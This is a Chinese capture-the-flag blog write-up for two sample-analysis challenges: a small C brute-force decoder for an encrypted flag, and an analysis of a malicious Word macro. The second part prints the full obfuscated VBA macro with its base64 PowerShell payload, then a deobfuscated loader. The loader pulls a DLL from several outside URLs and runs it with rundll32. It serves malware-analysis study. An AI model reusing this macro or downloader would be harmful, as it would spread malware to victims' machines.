墨者杯-样本分析

本文最后更新于 2024年6月6日 下午

墨者杯-样本分析

第二个题很有意思,值得记录一下。

样本分析1

给了一个BabyCrack.exe和一个flag.enc, 文件加密

进入ida看程序逻辑如下

对文件输入流中的数据进行了一些条件判断和加密

打开flag.enc提取数据

单字节爆破即可,exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
int main()
{
	char s[]={"knlhkjkhihjiiklwihlgkfkhkwhej{jgkjkihgiglgknklkmlij{hghehghehehihehfly"};
	int  arr[128];
	//for(int i=0;i<strlen(s);i++)
		for(int v7=0;v7<128;v7++)
		{
		    if(v7>47&&v7<=96)
		    	arr[v7]=v7+53; 	
		    else if(v7<=46)
		        arr[v7]=v7+v7%11;
		    else
		        arr[v7]=v7-v7%61;
		}
		//for(int i=0;i<128;i++)
		//printf("%c",arr[i]);
		for(int i=0;i<strlen(s);i++)
		   {
			for(int j=0;j<128;j++)
			{
				if(arr[j]==s[i])
				{
					printf("%c",j);
				}
			};
		}
	return 0;
}

得到697365634354467B437261636B305F526564324272696768745F32303230303430317D

十六进制解密得到flag

得到flag:isecCTF{Crack0_Red2Bright_20200401}

样本分析2

给了一个Macro.doc

使用oletools对其进行分析然后提去相关宏代码

https://github.com/decalage2/oletools

1
olevba ./Macro.doc

得到宏代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
Sub A()
    Dim B As String
    Dim D As Integer
    Dim Y2 As String
    Dim Y3 As Boolean
    D = 1 + 2
    C1 = "cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. &  P^Ow^er^she^L^L -w hidden -ENCOD "
    C2 = "cy5FLnQuIC4oLiIuWi55LjMuIi4rLiIuNS4iLikuIC4oLlsuVC55LlAuZS5dLiguIi57LjIufS57LjUufS57LjQufS57LjAufS57LjEufS57LjMufS4iLiAuLS5mLiAuJy5JLlIuZS5DLicuLC4nLlQuby4nLiwuJy5TLnkuUy50LkUuTS4uLicuLC4nLlIuWS4nLiwuJy5PLi4uRC4nLiwuJy5pLicuKS4gLikuOy4gLiAuUy5lLnQuLS5JLlQuRS5NLiAudi5hLnIuaS5BLkIubC5lLjouWS5KLnUuNC56LjMuIC4gLiguWy5ULnkucC5lLl0uKC4iLnsuNC59LnsuNS59LnsuMy59LnsuNi59LnsuMS59LnsuNy59LnsuMC59LnsuMi59LiIuIC4tLmYuJy5jLmUuJy4sLicuZS5ULi4uUy5lLlIuVi4nLiwuJy5wLk8uaS5uLlQuTS5BLk4uQS5nLkUuci4nLiwuJy5TLnQuZS5tLi4uJy4sLicuUy4nLiwuJy5ZLicuLC4nLm4uJy4sLicuaS4nLikuIC4gLikuOy4kLkUuci5yLm8uci5BLmMudC5pLm8ubi5QLnIuZS5mLmUuci5lLm4uYy5lLiAuPS4gLiguKC4nLlMuJy4rLicuaS5sLmUuJy4pLisuJy5uLicuKy4"
    Y1 = 1
    Y2 = "X"
    Y3 = True
    C3 = "oLicudC5sLicuKy4nLnkuQy5vLicuKS4rLicubi4nLisuKC4nLnQuJy4rLicuaS5uLnUuZS4nLikuKS47LiQuVS4xLnUuaC43LjQuOC49LiQuRS4zLjQuSC4gLisuIC5bLmMuaC5hLnIuXS4oLjYuNC4pLiAuKy4gLiQuRy4zLjUuUS47LiQuQi42LjIuUS49LiguKC4nLkwuJy4rLicuMC4zLicuKS4rLicuSy4nLikuOy4gLiguIC4gLmQuaS5yLiAuIC4oLicuVi5BLnIuSS4nLisuJy5BLicuKy4nLkIuTC4nLisuJy5lLjouei55LjMuNS4nLikuKS4uLnYuYS5MLlUuRS46LjouIi5DLmAuUi5lLkEuYC5ULmUuZC5gLkkuci5FLmMuVC5vLlIueS4iLiguJC5ILk8uTS5FLiAuKy4gLiguKC4oLicuWC5FLjguWi4nLisuJy4zLnQuJy4pLisuKC4nLm4uYy4nLisuJy41LmQuWC5FLjguTC4nLikuKy4nLjYuJy4rLicuei4zLicuKy4nLm8uJy4rLiguJy5vLicuKy4nLjMuWC4nLikuKy4nLkUuOC4nLikuLS5SLmUuUC5MLkEuQy5lLiAuKC5bLkMuSC5BLnIuXS44LjguKy5bLkMuSC5BLnIuXS42LjkuKy5bLkMuSC5BLnIuXS41LjYuKS4sLlsuQy5ILkEuc"
    If Y1 = 1 Then
        For i = 1 To 10
            Y2 = Y2 & Chr(i + 64)
        Next i
    End If
    C4 = "i5dLjkuMi4pLikuOy4kLk0uOS41LkEuPS4oLicuRi43LicuKy4nLjAuTi4nLikuOy4gLiAuKC5MLnMuIC4gLlYuQS5yLmkuQS5CLmwuZS46LlkuSi5VLjQuWi4zLikuLi52LmEuTC51LkUuOi46LiIucy5lLmAuQy51LnIuYC5pLmAuVC5ZLnAuYC5SLm8udC5PLkMuby5MLiIuIC49LiAuKC4oLicuVC5sLnMuJy4rLicuMS4nLikuKy4nLjIuJy4pLjsuJC5MLjUuXy5DLj0uKC4nLlAuNi4nLisuJy43LksuJy4pLjsuJC5WLmwuei5jLnouaS4wLiAuPS4gLiguJy5PLjIuJy4rLicuOC5DLicuKS47LiQuUC40LjAuTy49LiguJy5XLicuKy4oLicuMy4nLisuJy4xLkMuJy4pLikuOy4kLkYuNC5tLm4ucS5hLmYuPS4kLkguTy5NLkU"
    C5 = "uKy4oLiguJy57LjAufS5aLjMudC4nLisuKC4nLm4uYy4nLisuJy41LmQuJy4pLisuJy57LjAufS5MLjYuei4zLicuKy4nLm8uby4zLnsuMC4nLisuJy59LicuKS4gLiAuLS5mLlsuYy5ILmEuci5dLjkuMi4pLisuJC5WLmwuei5jLnouaS4wLisuKC4nLi4uJy4rLiguJy5kLmwuJy4rLicubC4nLikuKS47LiQuSi4wLjQuQi49LiguJy5RLicuKy4oLicuNC4wLicuKy4nLkwuJy4pLikuOy4kLk0ubC4zLmUudi5xLmwuPS4oLicuXS4nLisuJy5lLjEuJy4rLicuci5bLicuKy4nLlMuJy4rLiguJy46Li8uLy5hLm4uJy4rLicucy4nLisuJy52LmEudC4uLmMuby4nLisuJy5tLicuKy4nLi8uJy4pLisuKC4nLnMucC4tLicuKy4nLmQuJy4rLicuZC5tLmkubi4vLmYudy4nLikuKy4nLi8uJy4rLiguJy5ALl0uJy4rLicuZS4xLicuKS4rLicuci5bLicuKy4nLlMuJy4rLicuOi4vLicuKy4oLicuLy5nLmkudC4nLisuJy50LmguJy4rLicuZS4nLikuKy4oLicuaS5uLmQuJy4rLicuay5hLicuKS4rLiguJy5kLicuKy4nLmkuci5lLicuKS4rLicuYy50LicuKy4oLicuby5yLmwuLi5jLicuKy4nLm8uJy4pLisuJy5tLicuKy4nLi8uMi4nLisuJy4vLnEuJy4rLiguJy5PLlkuJy4rLicudy4nLikuKy4nLlQuJy4rLiguJy4vLkAuJy4rLicuXS5lLjEuci"
    C6 = "5bLicuKy4nLlMuJy4rLicuOi4vLicuKS4rLiguJy4vLmUubC5vLmcuJy4rLicucy4uLmcuJy4pLisuKC4nLjQuJy4rLicuZy50LmUuYy5oLm4uJy4rLicudC5sLm8uZy5pLmUuJy4pLisuJy5zLicuKy4oLicuLi5jLm8ubS4vLmIuJy4rLicueS4nLikuKy4oLicuby4nLisuJy51LnMuLy52LicuKS4rLiguJy4vLkAuJy4rLicuXS5lLjEuci4nLikuKy4oLicuWy5TLjouLy4vLicuKy4nLnAuYS4nLisuJy50LnQuYS4nLisuJy55LicuKy4nLmkucy50Lm8uby5lLicuKS4rLicuLi5jLicuKy4oLicuby5tLicuKy4nLi8udi5pLicuKS4rLiguJy5wLmkuby4tLicuKy4nLnouJy4pLisuKC4nLmUudC53LicuKy4nLm8uJy4pLisuKC4nLnguay4tLjEuJy4rLicuaC4nLikuKy4oLicubS4nLisuJy5wLnAuLy4nLikuKy4oLicuYy41Li8uQC4nLisuJy5dLicuKS4rLicuZS4nLisuKC4nLjEuci5bLlMuJy4rLicuOi4nLikuKy4oLicuLy4vLnIucy4nLisuJy52LicuKS4rLicubS5hLicuKy4oLicuYi4nLisuJy5pLm4uJy4pLisuKC4nLm4uJy4rLicuaC4uLmMuJy4pLisuKC4nLm8ubS4nLisuJy4vLm0ucC4nLisuJy4tLmM"
    Select Case Y3
        Case True
            Y4 = Y1 & Y2
        Case False
            Y5 = Y1 & Y2
    End Select
    C7 = "uby5uLicuKS4rLiguJy50LicuKy4nLnEubi4nLikuKy4oLicudC4vLjEuJy4rLicuNi4nLisuJy5xLlQuLy5ALicuKy4nLl0uZS4xLicuKS4rLiguJy5yLlsuUy4nLisuJy5zLjouLy4vLicuKy4nLmUuZS4nLikuKy4oLicubi4nLisuJy5tLm8uJy4pLisuKC4nLnIuZS55Li4uJy4rLicudC4nLisuJy51LnMuaS5uLicuKS4rLiguJy55LnMuJy4rLicucy4vLncucC4nLikuKy4oLicuLS5jLm8uJy4rLicubi50LmUuJy4rLicubi50LicuKS4rLiguJy4vLicuKy4nLm4udS5XLicuKy4nLi8uQC5dLmUuMS5yLlsuJy4pLisuJy5TLicuKy4oLicucy46Li8uJy4rLicuLy4nLisuJy5zLnUuJy4rLicuaS5lLm8ucC50LicuKS4rLicuby4nLisuJy5tLmkuJy4rLiguJy5wLmUuJy4rLicuLi5jLm8uJy4pLisuJy5tLicuKy4oLicuLy4nLisuJy53LmUuJy4"
    C8 = "pLisuKC4nLjEuMS4nLisuJy4tLicuKS4rLiguJy5rLm4uJy4rLicueC53Lm4uLy4nLisuJy5TLnMuJy4pLisuKC4nLkUuJy4rLicucy4vLicuKS4pLi4uIi5SLmUuUC5gLkwuYS5gLmMuRS4iLiguKC4nLl0uJy4rLiguJy5lLicuKy4nLjEuci5bLicuKS4rLicuUy4nLikuLC4oLlsuYS5yLnIuYS55Ll0uKC4nLnMuZC4nLiwuJy5zLncuJy4pLiwuKC4nLmgudC4nLisuJy50LnAuJy4pLiwuJy4zLmQuJy4pLlsuMS5dLikuLi4iLlMucC5MLmAuaS50LiIuKC4kLlIuNy4xLlAuIC4rLiAuJC5VLjEudS5oLjcuNC44LiAuKy4gLiQuWC40LjkuUi4pLjsuJC5JLjEuNC5HLj0uKC4nLlcuJy4rLiguJy45LicuKy4nLjQuRy4nLikuKS47LmYuby5yLmUuYS5jLmguIC4oLiQuUS54LjUuNS5pLnouNS4gLmkubi4gLiQuTS5sLjMuZS52LnEubC4pLnsudC5yLnkuey4oLi4uKC4nLk4uZS53LicuKy4nLi0uTy5iLmouJy4rLicuZS5jLnQuJy4pLiAucy55LlMudC5FLm0uLi5uLmUuVC4uLlcuRS5CLmMubC5pLk"
    C9 = "Uubi50LikuLi4iLmQuYC5PLmAudy5uLkwuby5gLkEuRC5mLkkubC5FLiIuKC4kLlEueC41LjUuaS56LjUuLC4gLiQuRi40Lm0ubi5xLmEuZi4pLjsuJC5HLjUuMC5DLj0uKC4nLlUuJy4rLiguJy4zLjcuJy4rLicuVy4nLikuKS47LkkuZi4gLiguKC4mLiguJy5HLmUudC4tLicuKy4nLkkudC5lLicuKy4nLm0uJy4pLiAuJC5GLjQubS5uLnEuYS5mLikuLi4iLkwuRS5OLmAuRy50LmguIi4gLi0uZy5lLiAuMy4xLjkuNi4zLikuIC57LiYuKC4nLnIuJy4rLicudS5uLmQubC4nLisuJy5sLjMuMi4nLikuIC4kLkYuNC5tLm4ucS5hLmYuLC4oLiguJy5DLicuKy4nLm8ubi50LnIuby4nLisuJy4xLl8uUi51LicuKS4rLicubi5ELicuKy4nLkwuJy4rLicuTC4nLikuLi4iLnQuYC5PLnMuYC5ULnIuSS5OLkcuIi4oLikuOy4kLkguMy43LkMuPS4oLicuSC4nLisuKC4nLjMuMC4nLisuJy5KLicuKS4pLjsuYi5yLmUuYS5rLjsuJC5LLjQuXy5RLj0uKC4nLk0uMS4nLisuJy42LlEuJy4pLn0ufS5jLmEudC5jLmguey59Ln0uJC5CLjcuMi5ILj0uKC4nLlMuJy4rLiguJy5fLl8uJy4rLicuWC4nLikuKS4="
    B = C1 & C2 & C3 & C4 & C5 & C6 & C7 & C8 & C9
    Shell B, vbHide
End Sub

base64进行解码

得到经过混淆的powershell代码

1
s.E.t. .(.".Z.y.3.".+.".5.".). .(.[.T.y.P.e.].(.".{.2.}.{.5.}.{.4.}.{.0.}.{.1.}.{.3.}.". .-.f. .'.I.R.e.C.'.,.'.T.o.'.,.'.S.y.S.t.E.M...'.,.'.R.Y.'.,.'.O...D.'.,.'.i.'.). .).;. . .S.e.t.-.I.T.E.M. .v.a.r.i.A.B.l.e.:.Y.J.u.4.z.3. . .(.[.T.y.p.e.].(.".{.4.}.{.5.}.{.3.}.{.6.}.{.1.}.{.7.}.{.0.}.{.2.}.". .-.f.'.c.e.'.,.'.e.T...S.e.R.V.'.,.'.p.O.i.n.T.M.A.N.A.g.E.r.'.,.'.S.t.e.m...'.,.'.S.'.,.'.Y.'.,.'.n.'.,.'.i.'.). . .).;.$.E.r.r.o.r.A.c.t.i.o.n.P.r.e.f.e.r.e.n.c.e. .=. .(.(.'.S.'.+.'.i.l.e.'.).+.'.n.'.+.(.'.t.l.'.+.'.y.C.o.'.).+.'.n.'.+.(.'.t.'.+.'.i.n.u.e.'.).).;.$.U.1.u.h.7.4.8.=.$.E.3.4.H. .+. .[.c.h.a.r.].(.6.4.). .+. .$.G.3.5.Q.;.$.B.6.2.Q.=.(.(.'.L.'.+.'.0.3.'.).+.'.K.'.).;. .(. . .d.i.r. . .(.'.V.A.r.I.'.+.'.A.'.+.'.B.L.'.+.'.e.:.z.y.3.5.'.).)...v.a.L.U.E.:.:.".C.`.R.e.A.`.T.e.d.`.I.r.E.c.T.o.R.y.".(.$.H.O.M.E. .+. .(.(.(.'.X.E.8.Z.'.+.'.3.t.'.).+.(.'.n.c.'.+.'.5.d.X.E.8.L.'.).+.'.6.'.+.'.z.3.'.+.'.o.'.+.(.'.o.'.+.'.3.X.'.).+.'.E.8.'.).-.R.e.P.L.A.C.e. .(.[.C.H.A.r.].8.8.+.[.C.H.A.r.].6.9.+.[.C.H.A.r.].5.6.).,.[.C.H.A.r.].9.2.).).;.$.M.9.5.A.=.(.'.F.7.'.+.'.0.N.'.).;. . .(.L.s. . .V.A.r.i.A.B.l.e.:.Y.J.U.4.Z.3.)...v.a.L.u.E.:.:.".s.e.`.C.u.r.`.i.`.T.Y.p.`.R.o.t.O.C.o.L.". .=. .(.(.'.T.l.s.'.+.'.1.'.).+.'.2.'.).;.$.L.5._.C.=.(.'.P.6.'.+.'.7.K.'.).;.$.V.l.z.c.z.i.0. .=. .(.'.O.2.'.+.'.8.C.'.).;.$.P.4.0.O.=.(.'.W.'.+.(.'.3.'.+.'.1.C.'.).).;.$.F.4.m.n.q.a.f.=.$.H.O.M.E.+.(.(.'.{.0.}.Z.3.t.'.+.(.'.n.c.'.+.'.5.d.'.).+.'.{.0.}.L.6.z.3.'.+.'.o.o.3.{.0.'.+.'.}.'.). . .-.f.[.c.H.a.r.].9.2.).+.$.V.l.z.c.z.i.0.+.(.'...'.+.(.'.d.l.'.+.'.l.'.).).;.$.J.0.4.B.=.(.'.Q.'.+.(.'.4.0.'.+.'.L.'.).).;.$.M.l.3.e.v.q.l.=.(.'.].'.+.'.e.1.'.+.'.r.[.'.+.'.S.'.+.(.'.:././.a.n.'.+.'.s.'.+.'.v.a.t...c.o.'.+.'.m.'.+.'./.'.).+.(.'.s.p.-.'.+.'.d.'.+.'.d.m.i.n./.f.w.'.).+.'./.'.+.(.'.@.].'.+.'.e.1.'.).+.'.r.[.'.+.'.S.'.+.'.:./.'.+.(.'./.g.i.t.'.+.'.t.h.'.+.'.e.'.).+.(.'.i.n.d.'.+.'.k.a.'.).+.(.'.d.'.+.'.i.r.e.'.).+.'.c.t.'.+.(.'.o.r.l...c.'.+.'.o.'.).+.'.m.'.+.'./.2.'.+.'./.q.'.+.(.'.O.Y.'.+.'.w.'.).+.'.T.'.+.(.'./.@.'.+.'.].e.1.r.[.'.+.'.S.'.+.'.:./.'.).+.(.'./.e.l.o.g.'.+.'.s...g.'.).+.(.'.4.'.+.'.g.t.e.c.h.n.'.+.'.t.l.o.g.i.e.'.).+.'.s.'.+.(.'...c.o.m./.b.'.+.'.y.'.).+.(.'.o.'.+.'.u.s./.v.'.).+.(.'./.@.'.+.'.].e.1.r.'.).+.(.'.[.S.:././.'.+.'.p.a.'.+.'.t.t.a.'.+.'.y.'.+.'.i.s.t.o.o.e.'.).+.'...c.'.+.(.'.o.m.'.+.'./.v.i.'.).+.(.'.p.i.o.-.'.+.'.z.'.).+.(.'.e.t.w.'.+.'.o.'.).+.(.'.x.k.-.1.'.+.'.h.'.).+.(.'.m.'.+.'.p.p./.'.).+.(.'.c.5./.@.'.+.'.].'.).+.'.e.'.+.(.'.1.r.[.S.'.+.'.:.'.).+.(.'././.r.s.'.+.'.v.'.).+.'.m.a.'.+.(.'.b.'.+.'.i.n.'.).+.(.'.n.'.+.'.h...c.'.).+.(.'.o.m.'.+.'./.m.p.'.+.'.-.c.o.n.'.).+.(.'.t.'.+.'.q.n.'.).+.(.'.t./.1.'.+.'.6.'.+.'.q.T./.@.'.+.'.].e.1.'.).+.(.'.r.[.S.'.+.'.s.:././.'.+.'.e.e.'.).+.(.'.n.'.+.'.m.o.'.).+.(.'.r.e.y...'.+.'.t.'.+.'.u.s.i.n.'.).+.(.'.y.s.'.+.'.s./.w.p.'.).+.(.'.-.c.o.'.+.'.n.t.e.'.+.'.n.t.'.).+.(.'./.'.+.'.n.u.W.'.+.'./.@.].e.1.r.[.'.).+.'.S.'.+.(.'.s.:./.'.+.'./.'.+.'.s.u.'.+.'.i.e.o.p.t.'.).+.'.o.'.+.'.m.i.'.+.(.'.p.e.'.+.'...c.o.'.).+.'.m.'.+.(.'./.'.+.'.w.e.'.).+.(.'.1.1.'.+.'.-.'.).+.(.'.k.n.'.+.'.x.w.n./.'.+.'.S.s.'.).+.(.'.E.'.+.'.s./.'.).)...".R.e.P.`.L.a.`.c.E.".(.(.'.].'.+.(.'.e.'.+.'.1.r.[.'.).+.'.S.'.).,.(.[.a.r.r.a.y.].(.'.s.d.'.,.'.s.w.'.).,.(.'.h.t.'.+.'.t.p.'.).,.'.3.d.'.).[.1.].)...".S.p.L.`.i.t.".(.$.R.7.1.P. .+. .$.U.1.u.h.7.4.8. .+. .$.X.4.9.R.).;.$.I.1.4.G.=.(.'.W.'.+.(.'.9.'.+.'.4.G.'.).).;.f.o.r.e.a.c.h. .(.$.Q.x.5.5.i.z.5. .i.n. .$.M.l.3.e.v.q.l.).{.t.r.y.{.(...(.'.N.e.w.'.+.'.-.O.b.j.'.+.'.e.c.t.'.). .s.y.S.t.E.m...n.e.T...W.E.B.c.l.i.E.n.t.)...".d.`.O.`.w.n.L.o.`.A.D.f.I.l.E.".(.$.Q.x.5.5.i.z.5.,. .$.F.4.m.n.q.a.f.).;.$.G.5.0.C.=.(.'.U.'.+.(.'.3.7.'.+.'.W.'.).).;.I.f. .(.(.&.(.'.G.e.t.-.'.+.'.I.t.e.'.+.'.m.'.). .$.F.4.m.n.q.a.f.)...".L.E.N.`.G.t.h.". .-.g.e. .3.1.9.6.3.). .{.&.(.'.r.'.+.'.u.n.d.l.'.+.'.l.3.2.'.). .$.F.4.m.n.q.a.f.,.(.(.'.C.'.+.'.o.n.t.r.o.'.+.'.1._.R.u.'.).+.'.n.D.'.+.'.L.'.+.'.L.'.)...".t.`.O.s.`.T.r.I.N.G.".(.).;.$.H.3.7.C.=.(.'.H.'.+.(.'.3.0.'.+.'.J.'.).).;.b.r.e.a.k.;.$.K.4._.Q.=.(.'.M.1.'.+.'.6.Q.'.).}.}.c.a.t.c.h.{.}.}.$.B.7.2.H.=.(.'.S.'.+.(.'._._.'.+.'.X.'.).).

手动处理一下一些混淆, 删除”.”,得到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
sEt ("Zy3"+"5") ([TyPe]("{2}{5}{4}{0}{1}{3}" -f 'IReC','To','SyStEM','RY','OD','i') );
Set-ITEM variABle:YJu4z3 ([Type]("{4}{5}{3}{6}{1}{7}{0}{2}" -f'ce','eTSeRV','pOinTMANAgEr','Stem','S','Y','n','i')  );
$ErrorActionPreference = (('S'+'ile')+'n'+('tl'+'yCo')+'n'+('t'+'inue'));
$U1uh748=$E34H + [char](64) + $G35Q;
$B62Q=(('L'+'03')+'K');
 (  dir  ('VArI'+'A'+'BL'+'e:zy35'))
vaLUE::"C`ReA`Ted`IrEcToRy" ($HOME + ((('XE8Z'+'3t')+('nc'+'5dXE8L')+'6'+'z3'+'o'+('o'+'3X')+'E8')-RePLACe ([CHAr]88+[CHAr]69+[CHAr]56),[CHAr]92));
$M95A=('F7'+'0N');
(Ls  VAriABle:YJU4Z3)vaLuE::"se`Cur`i`TYp`RotOCoL" = (('Tls'+'1')+'2');
$L5_C=('P6'+'7K');
$Vlzczi0 = ('O2'+'8C');
$P40O=('W'+('3'+'1C'));
$F4mnqaf=$HOME+(('{0}Z3t'+('nc'+'5d')+'{0}L6z3'+'oo3{0'+'}') -f[cHar]92)+$Vlzczi0+(''+('dl'+'l'));
$J04B=('Q'+('40'+'L'));
$Ml3evql=(']'+'e1'+'r['+'S'+('://an'+'s'+'vatco'+'m'+'/')+('sp-'+'d'+'dmin/fw')+'/'+('@]'+'e1')+'r['+'S'+':/'+('/git'+'th'+'e')+('ind'+'ka')+('d'+'ire')+'ct'+('orlc'+'o')+'m'+'/2'+'/q'+('OY'+'w')+'T'+('/@'+']e1r['+'S'+':/')+('/elog'+'sg')+('4'+'gtechn'+'tlogie')+'s'+('com/b'+'y')+('o'+'us/v')+('/@'+']e1r')+('[S://'+'pa'+'tta'+'y'+'istooe')+'c'+('om'+'/vi')+('pio-'+'z')+('etw'+'o')+('xk-1'+'h')+('m'+'pp/')+('c5/@'+']')+'e'+('1r[S'+':')+('//rs'+'v')+'ma'+('b'+'in')+('n'+'hc')+('om'+'/mp'+'-con')+('t'+'qn')+('t/1'+'6'+'qT/@'+']e1')+('r[S'+'s://'+'ee')+('n'+'mo')+('rey'+'t'+'usin')+('ys'+'s/wp')+('-co'+'nte'+'nt')+('/'+'nuW'+'/@]e1r[')+'S'+('s:/'+'/'+'su'+'ieopt')+'o'+'mi'+('pe'+'co')+'m'+('/'+'we')+('11'+'-')+('kn'+'xwn/'+'Ss')+('E'+'s/')).replace((']'+('e'+'1r[')+'S'),([array]('sd','sw'),('ht'+'tp'),'3d')[1]).SpLit($R71P + $U1uh748 + $X49R);
$I14G=('W'+('9'+'4G'));

write-host $Ml3evql

foreach ($Qx55iz5 in $Ml3evql) {
    try{
        (('New'+'-Obj'+'ect') syStEmneTWEBcliEnt)"d`O`wnLo`ADfIlE"($Qx55iz5, $F4mnqaf);
        $G50C=('U'+('37'+'W'));
        If ((&('Get-'+'Ite'+'m') $F4mnqaf)"LEN`Gth" -ge 31963) {&('r'+'undl'+'l32') $F4mnqaf,(('C'+'ontro'+'1_Ru')+'nD'+'L'+'L').tOsTrING();
        $H37C=('H'+('30'+'J'));
        break;
        $K4_Q=('M1'+'6Q')}
    } catch {}
}
$B72H=('S'+('__'+'X'))

powerdecode进行调试

https://github.com/Malandrone/PowerDecode

1
2
 $Ml3evql=(']'+'e1'+'r['+'S'+('://an'+'s'+'vatco'+'m'+'/')+('sp-'+'d'+'dmin/fw')+'/'+('@]'+'e1')+'r['+'S'+':/'+('/git'+'th'+'e')+('ind'+'ka')+('d'+'ire')+'ct'+('orlc'+'o')+'m'+'/2'+'/q'+('OY'+'w')+'T'+('/@'+']e1r['+'S'+':/')+('/elog'+'sg')+('4'+'gtechn'+'tlogie')+'s'+('com/b'+'y')+('o'+'us/v')+('/@'+']e1r')+('[S://'+'pa'+'tta'+'y'+'istooe')+'c'+('om'+'/vi')+('pio-'+'z')+('etw'+'o')+('xk-1'+'h')+('m'+'pp/')+('c5/@'+']')+'e'+('1r[S'+':')+('//rs'+'v')+'ma'+('b'+'in')+('n'+'hc')+('om'+'/mp'+'-con')+('t'+'qn')+('t/1'+'6'+'qT/@'+']e1')+('r[S'+'s://'+'ee')+('n'+'mo')+('rey'+'t'+'usin')+('ys'+'s/wp')+('-co'+'nte'+'nt')+('/'+'nuW'+'/@]e1r[')+'S'+('s:/'+'/'+'su'+'ieopt')+'o'+'mi'+('pe'+'co')+'m'+('/'+'we')+('11'+'-')+('kn'+'xwn/'+'Ss')+('E'+'s/')).replace((']'+('e'+'1r[')+'S'),([array]('sd','sw'),('ht'+'tp'),'3d')[1]).SpLit($R71P + $U1uh748 + $X49R);
echo $Ml3evql

得到

1
2
3
4
5
6
7
http://ansvatcom/sp-ddmin/fw/
http://gittheindkadirectorlcom/2/qOYwT/
http://elogsg4gtechntlogiescom/byous/v/
http://pattayistooecom/vipio-zetwoxk-1hmpp/c5/
http://rsvmabinnhcom/mp-contqnt/16qT/
https://eenmoreytusinyss/wp-content/nuW/
https://suieoptomipecom/we11-knxwn/SsEs/

看起来是下载链接

1
2
3
$F4mnqaf=$HOME+(('{0}Z3t'+('nc'+'5d')+'{0}L6z3'+'oo3{0'+'}') -f[cHar]92)+$Vlzczi0+(''+('dl'+'l'));
echo $F4mnqaf
(('C'+'ontro'+'1_Ru')+'nD'+'L'+'L').tOsTrING()

得到Contro1_RunDLL

观察整体的代码逻辑,判断获得的应该就是程序启动参数

则flag{Contro1_RunDLL}

墨者杯-样本分析
http://example.com/2024/06/06/MozheCup/
作者
p3cd0wn
发布于
2024年6月6日
许可协议